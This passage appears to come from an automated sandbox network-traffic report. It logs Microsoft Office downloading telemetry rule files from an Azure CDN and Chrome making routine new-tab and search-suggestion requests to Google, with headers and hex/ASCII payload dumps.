encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.6	49755	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:26 UTC	192	OUT	GET /rules/rule120621v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:26 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:26 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA41997E3" x-ms-request-id: 1f14184f-601e-0050-3802-482c9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123126Z-r1cf579d778v97q7hC1EWRf95c000000051g000000001eyv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:26 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.6	49757	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:26 UTC	192	OUT	GET /rules/rule120623v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:26 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:26 GMT Content-Type: text/xml Content-Length: 464 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97FB6C3C" x-ms-request-id: ad3e0835-e01e-0033-5701-484695000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123126Z-r1cf579d778dndrdhC1EWR4b24000000053g000000000mhr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:26 UTC	464	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	49761	172.217.21.36	443	8080	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:26 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.6	49763	172.217.21.36	443	8080	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:26 UTC	498	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-08 12:31:27 UTC	1018	IN	HTTP/1.1 200 OK Version: 702228742 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sun, 08 Dec 2024 12:31:27 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-08 12:31:27 UTC	372	IN	Data Raw: 32 35 38 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 258d)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-12-08 12:31:27 UTC	1390	IN	Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
2024-12-08 12:31:27 UTC	1390	IN	Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
2024-12-08 12:31:27 UTC	1390	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
2024-12-08 12:31:27 UTC	1390	IN	Data Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
2024-12-08 12:31:27 UTC	1390	IN	Data Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 33 32 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 2c 31 30 32 31 31 38 39 33 39 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700332,3700949,3701384,102118939],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(function(_){va
2024-12-08 12:31:27 UTC	1390	IN	Data Raw: 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 49 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 48 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4b 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 Data Ascii: c\u003dArray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Id\u003dfunction(a){return new _.Hd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Jd\u003dglobalThis.trustedTypes;_.Kd\u003dclass{constructor
2024-12-08 12:31:27 UTC	909	IN	Data Raw: 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 59 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 24 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4b 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4b 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 5a 64 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 61 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 Data Ascii: rn a.i;throw Error(\"F\");};_.Zd\u003dfunction(a){if(Yd.test(a))return a};_.$d\u003dfunction(a){if(a instanceof _.Kd)if(a instanceof _.Kd)a\u003da.i;else throw Error(\"F\");else a\u003d_.Zd(a);return a};_.ae\u003dfunction(a,b\u003ddocument){let c,d;b\u003
2024-12-08 12:31:27 UTC	380	IN	Data Raw: 31 37 35 0d 0a 66 28 62 2c 30 29 5c 75 30 30 33 64 5c 75 30 30 33 64 30 7d 3b 52 64 5c 75 30 30 33 64 5f 2e 4a 64 3b 5f 2e 56 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 2b 5c 22 5c 22 7d 7d 3b 59 64 5c 75 30 30 33 64 2f 5e 5c 5c 73 2a 28 3f 21 6a 61 76 61 73 63 72 69 70 74 3a 29 28 3f 3a 5b 5c 5c 77 2b 2e 2d 5d 2b 3a 7c 5b 5e 3a 2f 3f 23 5d 2a 28 3f 3a 5b 2f 3f 23 5d 7c 24 29 29 2f 69 3b 76 61 72 20 6c 65 2c 70 65 2c 68 65 3b 5f 2e 6a 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 6e 65 77 20 68 65 28 5f 2e 69 65 28 61 29 29 3a 66 65 7c 7c 28 66 65 5c 75 30 30 33 64 Data Ascii: 175f(b,0)\u003d\u003d0};Rd\u003d_.Jd;_.Vd\u003dclass{constructor(a){this.i\u003da}toString(){return this.i+\"\"}};Yd\u003d/^\\s(?!javascript:)(?:[\\w+.-]+:\|[^:/?#](?:[/?#]\|$))/i;var le,pe,he;_.je\u003dfunction(a){return a?new he(_.ie(a)):fe\|\|(fe\u003d
2024-12-08 12:31:27 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 76 61 72 20 63 5c 75 30 30 33 64 62 7c 7c 64 6f 63 75 6d 65 6e 74 3b 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 3f 61 5c 75 30 30 33 64 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 61 29 5b 30 5d 3a 28 63 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2c 61 3f 61 5c 75 30 30 33 64 28 62 7c 7c 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b Data Ascii: 8000var c\u003db\|\|document;c.getElementsByClassName?a\u003dc.getElementsByClassName(a)[0]:(c\u003ddocument,a?a\u003d(b\|\|c).querySelector(a?\".\"+a:\"\"):(b\u003db\|\|c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]\|\|null));

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.6	49762	172.217.21.36	443	8080	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:26 UTC	595	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-08 12:31:27 UTC	1266	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:27 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-INLCC38Iz1aUyx6JfWLivA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-08 12:31:27 UTC	124	IN	Data Raw: 33 31 39 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 66 6f 72 74 6e 69 74 65 20 77 72 61 70 70 65 64 22 2c 22 69 72 6f 6e 6d 61 6e 20 74 6f 75 72 6e 61 6d 65 6e 74 20 62 72 61 63 6b 65 74 73 22 2c 22 73 75 70 65 72 20 6d 69 63 72 6f 20 6e 61 73 64 61 71 20 65 78 74 65 6e 73 69 6f 6e 20 73 74 6f 63 6b 20 70 72 69 63 65 22 2c 22 77 69 6c 6c 20 74 68 65 72 65 20 62 65 20 61 72 Data Ascii: 319)]}'["",["fortnite wrapped","ironman tournament brackets","super micro nasdaq extension stock price","will there be ar
2024-12-08 12:31:27 UTC	676	IN	Data Raw: 63 61 6e 65 20 73 65 61 73 6f 6e 20 33 22 2c 22 74 75 72 6b 65 79 20 73 61 69 6e 74 20 6e 69 63 68 6f 6c 61 73 20 74 6f 6d 62 22 2c 22 73 74 6f 72 6d 20 64 61 72 72 61 67 68 20 77 65 61 74 68 65 72 20 77 61 72 6e 69 6e 67 73 22 2c 22 70 69 61 61 20 66 6f 6f 74 62 61 6c 6c 20 63 68 61 6d 70 69 6f 6e 73 68 69 70 73 22 2c 22 72 69 70 70 6c 65 20 78 72 70 20 6e 65 77 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f Data Ascii: cane season 3","turkey saint nicholas tomb","storm darragh weather warnings","piaa football championships","ripple xrp news"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNo
2024-12-08 12:31:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.6	49764	172.217.21.36	443	8080	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:27 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
